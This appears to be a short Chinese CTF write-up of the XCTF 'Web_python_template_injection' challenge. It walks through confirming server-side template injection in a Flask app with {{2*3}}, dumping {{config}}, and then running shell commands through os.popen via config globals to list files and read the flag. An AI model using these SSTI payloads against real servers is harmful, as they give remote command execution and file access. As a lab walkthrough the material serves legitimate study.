赞
踩
提示:本人24小时在线,如有疑问,可联系我。
提示:攻防世界Web_python_template_injection
感觉什么也看不出来。
用御剑和diresearch看看后台目录。
直接尝试使用flask模板的漏洞试试,构造的payload为:/{{2*3}}
页面显示6,说明存在“SSTI” :
然后查看config文件,测试配置文件是否有被禁用,可以看到,配置文件包并没有被禁用。
构造的payload为:/{{config}}
/{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}
/{{ config.__class__.__init__.__globals__['os'].popen('cat fl4g').read() }}
记住:
构造的payload为:/{{2*3}}
。说明存在“SSTI”
查看config文件,构造的payload为:/{{config}}
。
查看本地服务器文件/{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}
读取fl4g的相关内容信息,直接得到flag
构造的payload为:/{{ config.__class__.__init__.__globals__['os'].popen('cat fl4g').read() }}
答案。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。